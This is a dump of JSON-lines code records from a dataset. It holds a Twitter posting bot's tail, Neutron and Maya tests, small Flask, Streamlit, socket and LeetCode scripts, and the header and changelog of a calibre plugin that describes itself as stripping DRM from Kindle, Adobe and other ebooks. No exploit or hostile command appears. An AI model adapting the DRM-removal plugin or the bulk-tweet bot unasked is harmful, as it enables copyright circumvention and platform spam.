tweetspeedx\"+str(n))\n\ttdel=randint(0,delay/2)\n\top=randint(0,100)\n\tif op%2==0:\n\t\ttdel=delay-tdel\n\telse:\n\t\ttdel=delay+tdel\n\tprint(\"Pausing For \"+str(tdel/1000.0)+\" Seconds!!!\")\n\ttime.sleep(tdel/1000.0)\nprint(str(n)+\" Tweets Tweeted!!\")\nprint(\"Task Completed !!!\")\nprint(\"I am very Tired...\\nPress Enter To Logout!!\")\ninput()\nf=open(\"logout\",\"w\")\nf.write(\"# Command logfile created by Lynx 2.8.9rel.1 SpeedX\\n# Arg0 = lynx\\n# Arg1 = http://mobile.twitter.com/logout\\n# Arg2 = -cmd_log=logout\")\nf.write(\"\\nkey Right Arrow\\nkey Right Arrow\\nkey q\\nkey y\")\nf.close()\nos.system(\"lynx http://mobile.twitter.com/logout -cmd_script=logout\")\nos.system(\"bash greet\")\nexit()\n","sub_path":"TweetBot-master/tweetbot.py","file_name":"tweetbot.py","file_ext":"py","file_size_in_byte":2994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"147858028","text":"#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or\n# implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport gc\n\nfrom neutron_lib import context\nfrom sqlalchemy.ext import declarative\nimport testtools\n\nfrom neutron.db import standard_attr\nfrom neutron.tests import base\nfrom neutron.tests.unit import testlib_api\n\n\nclass StandardAttrTestCase(base.BaseTestCase):\n def setUp(self):\n super(StandardAttrTestCase, self).setUp()\n self.addCleanup(gc.collect)\n\n def _make_decl_base(self):\n # construct a new base so we don't interfere with the main\n # base used in the sql test fixtures\n return declarative.declarative_base(\n cls=standard_attr.model_base.NeutronBaseV2)\n\n def test_standard_attr_resource_model_map(self):\n rs_map = standard_attr.get_standard_attr_resource_model_map()\n base = self._make_decl_base()\n\n class MyModel(standard_attr.HasStandardAttributes,\n standard_attr.model_base.HasId,\n base):\n api_collections = ['my_resource', 'my_resource2']\n api_sub_resources = ['my_subresource']\n\n rs_map = standard_attr.get_standard_attr_resource_model_map()\n self.assertEqual(MyModel, rs_map['my_resource'])\n self.assertEqual(MyModel, rs_map['my_resource2'])\n self.assertEqual(MyModel, rs_map['my_subresource'])\n\n sub_rs_map = standard_attr.get_standard_attr_resource_model_map(\n include_resources=False,\n include_sub_resources=True)\n self.assertNotIn('my_resource', sub_rs_map)\n self.assertNotIn('my_resource2', sub_rs_map)\n self.assertEqual(MyModel, sub_rs_map['my_subresource'])\n\n nosub_rs_map = standard_attr.get_standard_attr_resource_model_map(\n include_resources=True,\n include_sub_resources=False)\n self.assertEqual(MyModel, nosub_rs_map['my_resource'])\n self.assertEqual(MyModel, nosub_rs_map['my_resource2'])\n self.assertNotIn('my_subresource', nosub_rs_map)\n\n class Dup(standard_attr.HasStandardAttributes,\n standard_attr.model_base.HasId,\n base):\n api_collections = ['my_resource']\n\n with testtools.ExpectedException(RuntimeError):\n standard_attr.get_standard_attr_resource_model_map()\n\n def test_standard_attr_resource_parent_map(self):\n base = self._make_decl_base()\n\n class TagSupportModel(standard_attr.HasStandardAttributes,\n standard_attr.model_base.HasId,\n base):\n collection_resource_map = {'collection_name': 'member_name'}\n tag_support = True\n\n class TagUnsupportModel(standard_attr.HasStandardAttributes,\n standard_attr.model_base.HasId,\n base):\n collection_resource_map = {'collection_name2': 'member_name2'}\n tag_support = False\n\n class TagUnsupportModel2(standard_attr.HasStandardAttributes,\n standard_attr.model_base.HasId,\n base):\n collection_resource_map = {'collection_name3': 'member_name3'}\n\n parent_map = standard_attr.get_tag_resource_parent_map()\n self.assertEqual('member_name', parent_map['collection_name'])\n self.assertNotIn('collection_name2', parent_map)\n self.assertNotIn('collection_name3', parent_map)\n\n class DupTagSupportModel(standard_attr.HasStandardAttributes,\n standard_attr.model_base.HasId,\n base):\n collection_resource_map = {'collection_name': 'member_name'}\n tag_support = True\n\n with testtools.ExpectedException(RuntimeError):\n standard_attr.get_tag_resource_parent_map()\n\n\nclass StandardAttrAPIImapctTestCase(testlib_api.SqlTestCase):\n \"\"\"Test case to determine if a resource has had new fields exposed.\"\"\"\n\n def test_api_collections_are_expected(self):\n # NOTE to reviewers. If this test is being modified, it means the\n # resources being extended by standard attr extensions have changed.\n # Ensure that the patch has made this discoverable to API users.\n # This means a new extension for a new resource or a new extension\n # indicating that an existing resource now has standard attributes.\n # Ensure devref list of resources is updated at\n # doc/source/devref/api_extensions.rst\n expected = ['subnets', 'trunks', 'routers', 'segments',\n 'security_group_rules', 'networks', 'policies',\n 'subnetpools', 'ports', 'security_groups', 'floatingips',\n 'logs']\n self.assertEqual(\n set(expected),\n set(standard_attr.get_standard_attr_resource_model_map().keys())\n )\n\n def test_api_tag_support_is_expected(self):\n # NOTE: If this test is being modified, it means the resources for tag\n # support are extended. It changes tag support API. The API change\n # should be exposed in release note for API users. And also it should\n # be list as other tag support resources in doc/source/devref/tag.rst\n expected = ['subnets', 'trunks', 'routers', 'networks', 'policies',\n 'subnetpools', 'ports', 'security_groups', 'floatingips']\n self.assertEqual(\n set(expected),\n set(standard_attr.get_tag_resource_parent_map().keys())\n )\n\n\nclass StandardAttrRevisesBulkDeleteTestCase(testlib_api.SqlTestCase):\n\n def test_bulk_delete_protection(self):\n # security group rules increment security groups so they must not be\n # allowed to be deleted in bulk\n mm = standard_attr.get_standard_attr_resource_model_map()\n sg_rule_model = mm['security_group_rules']\n with testtools.ExpectedException(RuntimeError):\n ctx = context.get_admin_context()\n ctx.session.query(sg_rule_model).delete()\n","sub_path":"neutron/tests/unit/db/test_standard_attr.py","file_name":"test_standard_attr.py","file_ext":"py","file_size_in_byte":6514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"237533918","text":"# -*- coding: utf-8 -*-\n\"\"\"Performance Testing\"\"\"\nfrom animio.test.lib import *\nfrom animio.lib import *\n\nimport mrv.maya.nt as nt\n\nimport maya.OpenMayaAnim as apianim \n\nimport time\nimport sys\n\nclass TestPerformance( unittest.TestCase ):\n\t\n\t@with_scene('21kcurves.mb')\n\tdef test_anim_handle(self):\n\t\t# manage all anim nt\n\t\tah = AnimationHandle.create()\n\t\tahapi = ah.object()\n\t\t\n\t\tst = time.time()\n\t\tis_not_ah = lambda n: n != ahapi\n\t\tsellist = nt.toSelectionList(nt.it.iterDgNodes(asNode=False, predicate=is_not_ah))\n\t\tah.set_animation(sellist)\n\t\telapsed = time.time() - st\n\t\tprint >>sys.stderr, \"Managed animation of roughly 21k nodes in %f s\" % elapsed\n\t\t\n\t\t\n\t\t# apply animation, worst case ( as it is already connected )\n\t\tst = time.time()\n\t\tah.apply_animation()\n\t\telapsed = time.time() - st\n\t\tprint >>sys.stderr, \"Re-Applied animation onto same existing animation of roughly 21k nodes in %f s\" % elapsed\n\t\t\n\t\t# clear animation\n\t\tst = time.time()\n\t\tpa = nt.api.MPlugArray()\n\t\tapianim.MAnimUtil.findAnimatedPlugs(sellist, pa)\n\t\t\n\t\t# do it the fast way - its easier to use mrv, but much faster to do it \n\t\t# directly\n\t\tmod = nt.api.MDGModifier( )\n\t\tfor anim_plug in pa:\n\t\t\tmod.disconnect(anim_plug.minput(), anim_plug )\n\t\t# END for each anim curve to disconnect\n\t\tmod.doIt()\n\t\telapsed = time.time() - st\n\t\tprint >>sys.stderr, \"Cleared animation on %i plugs in %f s\" % (len(pa), elapsed)\n\t\t\n\t\tassert len(nt.AnimCurve.findAnimation(sellist)) == 0\n\t\t\n\t\t# apply animation, best case as it is not yet connected\n\t\tst = time.time()\n\t\tah.apply_animation()\n\t\telapsed = time.time() - st\n\t\tprint >>sys.stderr, \"Applied animation of roughly 21k nodes in %f s\" % elapsed\n\t\t\n\t\t\n\t\t\n","sub_path":"animio/test/performance/test_performance.py","file_name":"test_performance.py","file_ext":"py","file_size_in_byte":1668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"347123112","text":"#!/usr/bin/python3\n\"\"\"\nusing my storage with flask\n\"\"\"\nfrom models import storage\nfrom flask import Flask, render_template\napp = Flask(__name__)\n\n\n@app.route('/states_list', strict_slashes=False)\ndef states_list():\n lista = [storage.all('State')[x] for x in storage.all('State')]\n return render_template('7-states_list.html', lista=lista)\n\n\n@app.teardown_appcontext\ndef close_(self):\n storage.close()\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port='5000')\n","sub_path":"web_flask/7-states_list.py","file_name":"7-states_list.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"177928714","text":"class Solution:\n\n def convert(self, s: str, numRows: int) -> str:\n if numRows == 1:\n return s\n arr = []\n for i in range(numRows):\n row = []\n for j in range(len(s)):\n row.append('')\n arr.append(row)\n i = 0\n j = 0\n direction = ''\n for k in range(len(s)):\n arr[i][j] = s[k]\n if i == 0:\n direction = 'down'\n elif i == numRows - 1:\n direction = 'up'\n\n if direction is 'up':\n i = i-1\n j = j+1\n elif direction is 'down':\n i = i+1\n ret = []\n for i in range(numRows):\n ret.append(''.join(arr[i]))\n return ''.join(ret)\n\n\n\n\n\nif __name__ == '__main__':\n sol = Solution()\n print(sol.convert('AB', 1))\n","sub_path":"problem6.py","file_name":"problem6.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"429022240","text":"# Aim: Open a site \"n\" number of times after a defined delay\n\n# Dependencies\nimport webbrowser\nimport time\n\n# Define the web address to be accessed\nweb_address = \"http://www.google.com\"\n\n# run a loop \"n\" times Eg. n = 3\nn = 3\n# Define a sleep-time variable (in seconds)\nsleep_time = 2\n# Keep track of n's iteration through count\ncount = 0\n# Loop for the task\nwhile(count < n):\n # Sleep for defined time\n time.sleep(sleep_time)\n # Open the website\n webbrowser.open(web_address)\n # Increment count\n count = count + 1\n# End Of Code","sub_path":"Project-1/Python-Tutorial/break_time.py","file_name":"break_time.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"275481280","text":"#-*- coding:utf-8 -*-\nimport socket\nimport threading\n\nbind_ip = '127.0.0.1'\nbind_port = 9999\n\nserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n# socket.AF_INET에서 ip4를 사용하는 것을 지정, socket.SOCK_STREAM에서 TCP를 사용하는 것을 지정.\n\nserver.bind((bind_ip, bind_port))\n#자신의 IP주소와 port를 설정한다.\n#상대방의 IP 주소와 port 를 설정하는 경우 connect 를 사용한다고 생각해도 좋다.\n\nserver.listen(5)\n#연결의 최대 저장 수를 설정한다.\nprint('[*]Listening on % s: %d'%(bind_ip,bind_port))\n\ndef handle_client(client_socket):\n bufsize = 1024\n while True:\n request = client_socket.recv(bufsize)\n client_socket.send(request)\n if request == 'exit':\n break\n client_socket.close()\n\nwhile True:\n client, addr = server.accept()\n #bind 된 소켓에서 새로운 소켓과 연결된 주소를 반환한다.\n print('[*] Accepted connection from : %s:%d' %(addr[0], addr[1]))\n\n client_handler = threading.Thread(target=handle_client, args= (client,))\n #threading 을 사용하여 스레드를 생성한다.\n #멀티 코어에 대응시키고 싶은 경우는 multiporcessing 를 사용하면 된다.\n #target은 호출 함수 (객체)를 지정하고 args 는 그 인수를 지정 하고 있다.\n\n client_handler.start()\n #처리를 시작한다.","sub_path":"python_Source/untitled2/chapter11_chat/TcpServer_1on1.py","file_name":"TcpServer_1on1.py","file_ext":"py","file_size_in_byte":1386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"170602647","text":"#!/usr/bin/env python\n#-*- coding:utf-8; mode:python; indent-tabs-mode: nil; c-basic-offset: 2; tab-width: 2 -*-\n\nfrom bes.key_value.key_value_list import key_value_list\n\nfrom rebuild.recipe.value.masked_value import masked_value\nfrom rebuild.recipe.value.masked_value_list import masked_value_list\nfrom rebuild.recipe.value.value_key_values import value_key_values\n\nfrom .ingest_method_descriptor_http import ingest_method_descriptor_http\nfrom .ingest_method_descriptor_git import ingest_method_descriptor_git\n\nfrom .ingest_method import ingest_method\n\nclass ingest_unit_test(object):\n\n @classmethod\n def make_ingest_method(clazz, method, url = None, checksum = None, ingested_filename = None):\n method = method or 'http'\n url = url or 'http://www.examples.com/foo.zip'\n checksum = checksum or 'chk'\n ingested_filename = ingested_filename or 'foo.zop'\n values = masked_value_list([\n masked_value('all', value_key_values(value = key_value_list.parse('url={}'.format(url)))),\n masked_value('all', value_key_values(value = key_value_list.parse('checksum={}'.format(checksum)))),\n masked_value('all', value_key_values(value = key_value_list.parse('ingested_filename={}'.format(ingested_filename)))),\n ])\n\n if method == 'git':\n desc = ingest_method_descriptor_git()\n elif method == 'http':\n desc = ingest_method_descriptor_http()\n else:\n raise RuntimeError('invalid method: {} - should be one of: git http'.format(method))\n \n return ingest_method(desc, values)\n","sub_path":"lib/rebuild/ingest/ingest_unit_test.py","file_name":"ingest_unit_test.py","file_ext":"py","file_size_in_byte":1522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"360723640","text":"import sys\nimport csv\nfrom datetime import datetime, timedelta\n\n## takes HH:MM:SS.MS format string and returns total number of seconds\ndef convertToSeconds(time_string):\n\thours, minutes, seconds_and_milli = time_string.split(':')\n\tseconds, milliseconds = seconds_and_milli.split('.')\n\t## float(timedelta(hours=int(hours), minutes=int(minutes), seconds=int(seconds), milliseconds=int(milliseconds)).total_seconds())\n\ttotal = float(hours) * 3600 + float(minutes) * 60 + float(seconds) + float(milliseconds) / 1000\n\treturn total\n\ndef main():\n\t## read csv from stdin into nested list containing each line\n\tout_rows = []\n\tbuffer = sys.stdin.buffer\n\tlines = []\n\tfor line in buffer:\n\t\tline = line.strip()\n\t\tcontent = line.decode('utf-8', 'replace')\n\t\tlines.append(content)\n\t# data = sys.stdin.read().splitlines()\n\t# csv_reader = csv.DictReader(data)\n\tcsv_reader = csv.DictReader(lines)\n\tfor row in csv_reader:\n\n\t\ttry: \n\t\t\t## convert pacific to eastern time, and write to output as ISO-8601\n\t\t\ttimestamp = row['Timestamp']\n\t\t\tpacific_datetime = datetime.strptime(timestamp, '%m/%d/%y %I:%M:%S %p') \n\t\t\teastern_datetime = pacific_datetime + timedelta(hours=3)\n\n\t\t\tout_eastern_isoformat = eastern_datetime.isoformat()\n\n\t\t\t## format zip code as 5 digits, if less than 5 digits, prepend zeroes until a width of 5 is achieved\n\t\t\tzipcode = row['ZIP']\n\t\t\tout_padded_zipcode = zipcode.zfill(5)\n\n\t\t\t## Fullname should be converted to uppercase \n\t\t\tout_fullname = row['FullName'].upper()\n\n\t\t\t## Address is passed through as is\n\t\t\tout_address = row[\"Address\"]\n\n\t\t\t## Foo Duration and Bar Duration are in HH:MM:SS.MS format\n\t\t\t## convert both to total number of seconds in floating point format without rounding\n\t\t\tfoo_duration = row['FooDuration']\n\t\t\tbar_duration = row['BarDuration']\n\n\t\t\tout_foo_total_seconds = convertToSeconds(foo_duration)\n\t\t\tout_bar_total_seconds = convertToSeconds(bar_duration)\n\n\t\t\t## instead of reading the value from TotalDuration, \n\t\t\t## replace with the sum of foo total seconds and bar total seconds \n\t\t\tout_total_duration = out_foo_total_seconds + out_bar_total_seconds\n\n\t\t\t## Notes\n\t\t\tout_notes = row[\"Notes\"]\n\n\t\t\tout_row = [\n\t\t\t\t\tout_eastern_isoformat, \n\t\t\t\t\tout_address, \n\t\t\t\t\tout_padded_zipcode, \n\t\t\t\t\tout_fullname, \n\t\t\t\t\tstr(out_foo_total_seconds), \n\t\t\t\t\tstr(out_bar_total_seconds), \n\t\t\t\t\tstr(out_total_duration), \n\t\t\t\t\tout_notes]\n\n\t\t\tout_rows.append(out_row)\n\n\t\t## if invalid unicode causes an error within any of the datetime parsing/float math\n\t\t## skip row\n\t\texcept Exception as e:\n\t\t\tsys.stderr.write(\"Error caused by invalid character, skipping row\\n\")\n\t\t\tcontinue;\n\n\n\tcsv_writer = csv.writer(sys.stdout, delimiter=',')\n\n\t## write fieldnames \n\tfieldnames = csv_reader.fieldnames\n\tcsv_writer.writerow(fieldnames)\n\n\t## write each list to stdout as one row\n\tfor out_row in out_rows:\n\t\tcsv_writer.writerow(out_row)\n\n\nif __name__ == '__main__':\n\tmain()\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"normalizer.py","file_name":"normalizer.py","file_ext":"py","file_size_in_byte":2881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"193516560","text":"import pandas as pd\r\nimport numpy as np\r\nfrom pathlib import Path\r\nimport sqlite3\r\nfrom sqlite3 import Connection\r\nimport streamlit as st\r\nimport pandas as pd\r\n\r\n#URI_SQLITE_DB = \"test.db\"\r\nURI_SQLITE_DB = \"test.db\"\r\n\r\ndef init_db(conn: Connection):\r\n\tconn.execute(\r\n\t\t\"\"\"CREATE TABLE IF NOT EXISTS test\r\n\t\t\t(\r\n\t\t\t\tINPUT1 INT,\r\n\t\t\t\tINPUT2 INT\r\n\t\t\t);\"\"\"\r\n\t)\r\n\tconn.commit()\r\n\r\n\r\ndef display_data(conn: Connection):\r\n\tif st.checkbox(\"Display data in sqlite databse\"):\r\n\t\tst.dataframe(get_data(conn))\r\n\r\n\r\ndef get_data(conn: Connection):\r\n\tdf = pd.read_sql(\"SELECT * FROM test\", con=conn)\r\n\treturn df\r\n\r\n\r\n@st.cache(hash_funcs={Connection: id})\r\ndef get_connection(path: str):\r\n\t\"\"\"Put the connection in cache to reuse if path does not change between Streamlit reruns.\r\n\tNB : https://stackoverflow.com/questions/48218065/programmingerror-sqlite-objects-created-in-a-thread-can-only-be-used-in-that-sa\r\n\t\"\"\"\r\n\treturn sqlite3.connect(path, check_same_thread=False)\r\n\r\n\r\n############### to export datafram in excel with button #############\r\nimport base64\r\nfrom io import BytesIO\r\n#pip install xlsxwriter\r\ndef to_excel(df):\r\n\toutput = BytesIO()\r\n\twriter = pd.ExcelWriter(output, engine='xlsxwriter')\r\n\tdf.to_excel(writer, index=True, sheet_name='Sheet1') # <--- here\r\n\twriter.save()\r\n\tprocessed_data = output.getvalue()\r\n\treturn processed_data\r\n\r\ndef get_table_download_link(df):\r\n\t\"\"\"Generates a link allowing the data in a given panda dataframe to be downloaded\r\n\tin: dataframe\r\n\tout: href string\r\n\t\"\"\"\r\n\tval = to_excel(df)\r\n\tb64 = base64.b64encode(val) # val looks like b'...'\r\n\treturn f'<a href=\"data:application/octet-stream;base64,{b64.decode()}\" download=\"extract.xlsx\">Download xlsx file</a>' # decode b'abc' => abc\r\n# df = ... # your dataframe\r\n# st.markdown(get_table_download_link(df), unsafe_allow_html=True)\r\n\r\ndef main():\r\n\t#### First part DB ##########\r\n\tdef build_sidebar(conn: Connection):\r\n\t\tif st.button(\"Save to list\"):\r\n\t\t\tconn.execute(f\"INSERT INTO test (INPUT1, INPUT2) VALUES ({input1}, {input2})\")\r\n\t\t\tconn.commit()\r\n\tconn = get_connection(URI_SQLITE_DB)\r\n\tinit_db(conn)\r\n\t#############################\r\n\r\n\tinput1 = 1\r\n\tinput2 = 2\r\n\r\n\r\n\t################## Export to Excel SQLite\r\n\tbuild_sidebar(conn)\r\n\tdisplay_data(conn)\r\n\tdf = get_data(conn)\r\n\t#df = pd.DataFrame(np.random.randint(0,100,size=(100, 4)), columns=list('ABCD'))\r\n\tdownload = st.button(\"export to excel\")\r\n\tif download:\r\n\t\tdf\r\n\t\tst.markdown(get_table_download_link(df), unsafe_allow_html=True)\r\n\t\r\nif __name__ == \"__main__\":\r\n\tmain()","sub_path":"sqlite_export_xls.py","file_name":"sqlite_export_xls.py","file_ext":"py","file_size_in_byte":2518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"600000660","text":"from typing import List\n\n\nclass Solution:\n # def plusOne(self, digits: List[int]) -> List[int]:\n # # adding 1 in the beginning is the same as adding a carryover\n # # while carryover > 0 && index in bounds\n # # store sum % 10 to current index, decrement index\n # # after loop, if carryover > 0, prepend 1 to digits\n # carry = 1\n # i = len(digits) - 1\n # while carry > 0 and i >= 0:\n # digits[i] += carry\n # if digits[i] >= 10:\n # carry = 1\n # digits[i] %= 10\n # else:\n # carry = 0\n # i -=1\n #\n # if carry > 0:\n # digits.insert(0, 1)\n #\n # return digits\n\n # def plusOne(self, digits: List[int]) -> List[int]:\n # rev = list(reversed(digits))\n # carry = 1\n # i = 0\n # while carry > 0:\n # if i < len(rev):\n # rev[i] += 1\n # if rev[i] == 10:\n # carry = 1\n # rev[i] = 0\n # else:\n # carry = 0\n # else:\n # if carry > 0:\n # rev.append(carry)\n # carry = 0\n #\n # i += 1\n #\n # return list(reversed(rev))\n\n def plusOne(self, digits: List[int]) -> List[int]:\n carry = 1\n i = len(digits) - 1\n while carry > 0:\n if i >= 0:\n digits[i] += carry\n if digits[i] == 10:\n carry = 1\n digits[i] = 0\n else:\n carry = 0\n else:\n if carry > 0:\n digits.insert(0, carry)\n carry = 0\n i -= 1\n return digits\n\nif __name__ == '__main__':\n digits = [1,2,3]\n # [1,2,4]\n\n # digits = [4,3,2,1]\n # [4,3,2,2]\n\n # digits = [9]\n # [1,0]\n\n result = Solution().plusOne(digits)\n print(result)\n","sub_path":"0066_plus_one.py","file_name":"0066_plus_one.py","file_ext":"py","file_size_in_byte":1983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"625006025","text":"\"\"\"\n4.\tНайти сумму n элементов следующего ряда чисел: 1 -0.5 0.25 -0.125 ...\nКоличество элементов (n) вводится с клавиатуры.\n\nПример:\nВведите количество элементов: 3\nКоличество элементов - 3, их сумма - 0.75\n\nЗДЕСЬ ДОЛЖНА БЫТЬ РЕАЛИЗАЦИЯ ЧЕРЕЗ ЦИКЛ\n\"\"\"\nwhile True:\n try:\n n = int(input('Введите кол-во элементов для ряда (1 -0.5 0.25 -0.125 ...), для завершения введите 0: '))\n if n == 0:\n print('Программа завершена')\n break\n if n < 0:\n print('Отрицательное число')\n continue\n\n amount, element = 0, 1\n for i in range(n):\n amount += element\n element /= -2\n print(f'Сумма элементов ряда: {amount}')\n\n except ValueError:\n print('Некорректный ввод')\n","sub_path":"Урок 2. Практическое задание/task_4/task_4_1.py","file_name":"task_4_1.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"523926106","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom __future__ import print_function\n\n# __init__.py for DeDRM_plugin\n# Copyright © 2008-2020 Apprentice Harper et al.\n# Copyright © 2021-2023 NoDRM\n\n__license__ = 'GPL v3'\n__docformat__ = 'restructuredtext en'\n\n\n# Released under the terms of the GNU General Public Licence, version 3\n# <http://www.gnu.org/licenses/>\n#\n# All credit given to i♥cabbages and The Dark Reverser for the original standalone scripts.\n# We had the much easier job of converting them to a calibre plugin.\n#\n# This plugin is meant to decrypt eReader PDBs, Adobe Adept ePubs, Barnes & Noble ePubs,\n# Adobe Adept PDFs, Amazon Kindle and Mobipocket files without having\n# to install any dependencies... other than having calibre installed, of course.\n#\n# Configuration:\n# Check out the plugin's configuration settings by clicking the \"Customize plugin\"\n# button when you have the \"DeDRM\" plugin highlighted (under Preferences->\n# Plugins->File type plugins). Once you have the configuration dialog open, you'll\n# see a Help link on the top right-hand side.\n#\n# Revision history:\n# 6.0.0 - Initial release\n# 6.0.1 - Bug Fixes for Windows App, Kindle for Mac and Windows Adobe Digital Editions\n# 6.0.2 - Restored call to Wine to get Kindle for PC keys, added for ADE\n# 6.0.3 - Fixes for Kindle for Mac and Windows non-ascii user names\n# 6.0.4 - Fixes for stand-alone scripts and applications\n# and pdb files in plugin and initial conversion of prefs.\n# 6.0.5 - Fix a key issue\n# 6.0.6 - Fix up an incorrect function call\n# 6.0.7 - Error handling for incomplete PDF metadata\n# 6.0.8 - Fixes a Wine key issue and topaz support\n# 6.0.9 - Ported to work with newer versions of Calibre (moved to Qt5). Still supports older Qt4 versions.\n# 6.1.0 - Fixed multiple books import problem and PDF import with no key problem\n# 6.2.0 - Support for getting B&N key from nook Study log. Fix for UTF-8 filenames in Adobe ePubs.\n# Fix for not copying needed files. Fix for getting default Adobe key for PDFs\n# 6.2.1 - Fix for non-ascii Windows user names\n# 6.2.2 - Added URL method for B&N/nook books\n# 6.3.0 - Added in Kindle for Android serial number solution\n# 6.3.1 - Version number bump for clarity\n# 6.3.2 - Fixed Kindle for Android help file\n# 6.3.3 - Bug fix for Kindle for PC support\n# 6.3.4 - Fixes for Kindle for Android, Linux, and Kobo 3.17\n# 6.3.5 - Fixes for Linux, and Kobo 3.19 and more logging\n# 6.3.6 - Fixes for ADE ePub and PDF introduced in 6.3.5\n# 6.4.0 - Updated for new Kindle for PC encryption\n# 6.4.1 - Fix for some new tags in Topaz ebooks.\n# 6.4.2 - Fix for more new tags in Topaz ebooks and very small Topaz ebooks\n# 6.4.3 - Fix for error that only appears when not in debug mode\n# Also includes fix for Macs with bonded ethernet ports\n# 6.5.0 - Big update to Macintosh app\n# Fix for some more 'new' tags in Topaz ebooks.\n# Fix an error in wineutils.py\n# 6.5.1 - Updated version number, added PDF check for DRM-free documents\n# 6.5.2 - Another Topaz fix\n# 6.5.3 - Warn about KFX files explicitly\n# 6.5.4 - Mac App Fix, improve PDF decryption, handle latest tcl changes in ActivePython\n# 6.5.5 - Finally a fix for the Windows non-ASCII user names.\n# 6.6.0 - Add kfx and kfx-zip as supported file types (also invoke this plugin if the original\n# imported format was azw8 since that may be converted to kfx)\n# 6.6.1 - Thanks to wzyboy for a fix for stand-alone tools, and the new folder structure.\n# 6.6.2 - revamp of folders to get Mac OS X app working. Updated to 64-bit app. Various fixes.\n# 6.6.3 - More cleanup of kindle book names and start of support for .kinf2018\n# 6.7.0 - Handle new library in calibre.\n# 6.8.0 - Full support for .kinf2018 and new KFX encryption (Kindle for PC/Mac 2.5+)\n# 6.8.1 - Kindle key fix for Mac OS X Big Sur\n# 7.0.0 - Switched to Python 3 for calibre 5.0. Thanks to all who contributed\n# 7.0.1 - More Python 3 changes. Adobe PDF decryption should now work in some cases\n# 7.0.2 - More Python 3 changes. Adobe PDF decryption should now work on PC too.\n# 7.0.3 - More Python 3 changes. Integer division in ineptpdf.py\n# 7.1.0 - Full release for calibre 5.x\n# 7.2.0 - Update for latest KFX changes, and Python 3 Obok fixes.\n# 7.2.1 - Whitespace!\n# 10.0.0 - First forked version by NoDRM. See CHANGELOG.md for details.\n# 10.0.1 - Fixes a bug in the watermark code.\n# 10.0.2 - Fix Kindle for Mac & update Adobe key retrieval\n# For changes made in 10.0.3 and above, see the CHANGELOG.md file\n\n\"\"\"\nDecrypt DRMed ebooks.\n\"\"\"\n\nimport codecs\nimport sys, os\nimport time\nimport traceback\n\n#@@CALIBRE_COMPAT_CODE@@\n\ntry: \n try: \n from . import __version\n except:\n import __version\nexcept: \n print(\"#############################\")\n print(\"Failed to load the DeDRM plugin\")\n print(\"Did you bundle this from source code yourself? If so, you'll need to run make_release.py instead to generate a valid plugin file.\")\n print(\"If you have no idea what the above means, please redownload the most recent version of the plugin from the Github Releases page.\")\n print(\"If you still receive this error with the released version, please open a bug report and attach the following information:\")\n print(\"#############################\")\n print(\"Debug information:\")\n print(\"__version not found, path is:\")\n print(sys.path)\n print(\"I'm at:\")\n print(__file__)\n print(\"#############################\")\n raise\n\n\nclass DeDRMError(Exception):\n pass\n\ntry: \n from calibre.customize import FileTypePlugin\nexcept: \n # Allow import without Calibre.\n class FileTypePlugin:\n pass\n\ntry:\n from calibre.constants import iswindows, isosx\nexcept:\n iswindows = sys.platform.startswith('win')\n isosx = sys.platform.startswith('darwin')\n\ntry: \n from calibre.utils.config import config_dir\nexcept:\n config_dir = \"\"\n\ntry: \n from . import utilities\nexcept: \n import utilities\n\n\nPLUGIN_NAME = __version.PLUGIN_NAME\nPLUGIN_VERSION = __version.PLUGIN_VERSION\nPLUGIN_VERSION_TUPLE = __version.PLUGIN_VERSION_TUPLE\n\nclass DeDRM(FileTypePlugin):\n name = PLUGIN_NAME\n description = \"Removes DRM from Adobe Adept (including Kobo), Barnes & Noble, Amazon Kindle, Mobipocket and eReader ebooks. Credit given to i♥cabbages and The Dark Reverser for the original stand-alone scripts.\"\n supported_platforms = ['linux', 'osx', 'windows']\n author = \"Apprentice Alf, Apprentice Harper, NoDRM, The Dark Reverser and i♥cabbages\"\n version = PLUGIN_VERSION_TUPLE\n #minimum_calibre_version = (5, 0, 0) # Python 3.\n minimum_calibre_version = (2, 0, 0) # Needs Calibre 1.0 minimum. 1.X untested.\n file_types = set(['epub','pdf','pdb','prc','mobi','pobi','azw','azw1','azw3','azw4','azw8','tpz','kfx','kfx-zip'])\n on_import = True\n on_preprocess = True\n priority = 600\n\n\n def cli_main(self, data):\n from .standalone import main\n main(data)\n \n def initialize(self):\n \"\"\"\n Extracting a couple Python scripts if running on Linux, \n just in case we need to run them in Wine.\n\n The extraction only happens once per version of the plugin\n Also perform upgrade of preferences once per version\n \"\"\"\n\n try:\n self.pluginsdir = os.path.join(config_dir,\"plugins\")\n if not os.path.exists(self.pluginsdir):\n 